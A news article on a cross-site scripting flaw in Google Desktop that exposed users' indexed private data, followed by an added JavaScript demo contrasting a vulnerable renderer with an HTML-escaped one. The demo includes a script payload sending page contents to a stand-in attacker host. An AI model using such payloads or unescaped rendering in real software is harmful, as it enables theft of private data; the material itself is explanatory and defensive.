Critical Vulnerability Caught In Google Desktop - InformationWeek

Google is pushing out a fix to users through its auto-update mechanism, but security pros recommend that users update their systems manually.

A security company is advising people who use Google Desktop to immediately download the latest version to protect their computers from a critical vulnerability.

Danny Allan, director of security research at Watchfire, a security and analysis company, says researchers found a vulnerability in Google Desktop that puts users' private information at risk and enables remote attackers to run programs on affected machines. Allan says they reported the vulnerability to Google on Jan. 4, and the online search leader created a fix for it on Feb. 1.

Allan notes that while Google says it can automatically update its software and take care of the vulnerability, he has had to manually update his three home computers. "The fix is in their latest version," he says. "My software did not [automatically] patch. We had some issues with the updating mechanism. It didn't work at all. We had to install it manually."

Barry Schnitt, a Google spokesman, says the company started pushing out auto updates a few weeks ago and is still in the process of getting to its millions of users. He also says the auto update will work in the "vast majority" of cases. "A fix was developed quickly, and users are being automatically updated with the patch. In addition, we have [added] another layer of security checks to the latest version of Google Desktop to protect users from similar vulnerabilities in the future," Schnitt says.

Google hasn't received any reports of the vulnerability being exploited, Schnitt says. "However, users should make sure they are running the latest version of Google Desktop by going to and downloading the latest version and installing it," he adds.

Watchfire's Allan says there actually are three separate flaws wrapped up in this vulnerability. All three are cross-site scripting (XSS) issues, which allow remote attackers to inject JavaScript into a Web application; Google Desktop is exposed because its search interface is itself a Web application rendered in the user's browser. Allan says about 80% of Web applications are vulnerable to cross-site scripting to varying degrees, but the Google Desktop vulnerability "constitutes the most serious outcome that I have seen."

Google Desktop has the ability to cache and remember all of a user's private and corporate information. It basically is a mini agent that lives on the desktop computer and crawls through e-mail, zip files, office documents, and Web sites visited. It indexes all of the information and stores it within its cache.

This vulnerability allows a remote attacker to access this cache and all the information in it, explains Allan.

The attack is delivered when the user clicks a link in an e-mail or visits a malicious Web site. The crafted link or page, according to Allan, causes the malicious script to be injected into Google Desktop's Web interface, where it runs in the user's browser.

Once the script is running, the attacker can search for information on the computer and download it to his own system, control how the Web application functions, and run programs remotely on the computer. Allan notes that the first two uses are serious but calls the remote control a critical issue.
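The cross-site scripting pattern described above, as an added example that is not Google Desktop's code or Watchfire's findings: a hypothetical local search interface for a desktop indexer that reflects the search query into its results page. The vulnerable renderer echoes the query unescaped, so a link carrying a script payload turns the results page into an exfiltration tool for whatever the index returns; the hardened renderer escapes every untrusted value for its HTML context. The base URL, port, sample index entries, and payload are all constructed assumptions.

```javascript
// Added example, not Google Desktop code: reflected XSS in a hypothetical
// local search interface, beside its hardened form.

// Assumption: a desktop indexer serving its search UI on a local port.
const LOCAL_SEARCH_BASE = "http://127.0.0.1:8080/search";

// Constructed sample index entries, standing in for the indexer's cache.
const SAMPLE_INDEX = [
  { title: "Q4 budget.xls", snippet: "Projected revenue for Q4 ..." },
  { title: "Mail from HR", snippet: "Your salary review is scheduled ..." },
];

// Minimal HTML escaping for text placed into element content or a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable renderer: echoes the query and the cached hits unescaped.
function renderVulnerable(query, hits) {
  const rows = hits.map(h => `<li>${h.title}: ${h.snippet}</li>`).join("");
  return `<h1>Results for ${query}</h1><ul>${rows}</ul>`;
}

// Hardened renderer: every untrusted value is escaped for its HTML context.
function renderHardened(query, hits) {
  const rows = hits
    .map(h => `<li>${escapeHtml(h.title)}: ${escapeHtml(h.snippet)}</li>`)
    .join("");
  return `<h1>Results for ${escapeHtml(query)}</h1><ul>${rows}</ul>`;
}

// Attacker side: build the link the victim is lured into clicking
// (in an e-mail, or as a redirect from a malicious page).
function buildAttackLink(base, payload) {
  const u = new URL(base);
  u.searchParams.set("q", payload);
  return u.toString();
}

// Victim side: the browser follows the link and the local UI handles it.
// A real indexer would search its cache here; the sample index stands in.
function handleSearch(link, render) {
  const q = new URL(link).searchParams.get("q") || "";
  return render(q, SAMPLE_INDEX);
}

// Did the rendered page end up containing a live <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed payload: ship the rendered (cached) results to the attacker.
// It is never executed here; the point is whether it survives rendering.
const PAYLOAD =
  '<script>fetch("http://attacker.invalid/?d=" +' +
  'encodeURIComponent(document.body.innerHTML))</script>';

// Run the same crafted link through both renderers.
function demo() {
  const link = buildAttackLink(LOCAL_SEARCH_BASE, PAYLOAD);
  return {
    vulnerable: containsScriptTag(handleSearch(link, renderVulnerable)),
    hardened: containsScriptTag(handleSearch(link, renderHardened)),
  };
}

console.log(demo()); // { vulnerable: true, hardened: false }
```

The escaping in `renderHardened` only covers HTML element content and quoted attribute values; a query echoed into a JavaScript block, a URL, or an unquoted attribute needs the encoding for that context instead. Note also that the sample hits are escaped too: an indexer's cache contains attacker-influenced content (e-mail bodies, visited pages), so a stored variant of the same bug is possible even when the query itself is handled correctly.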
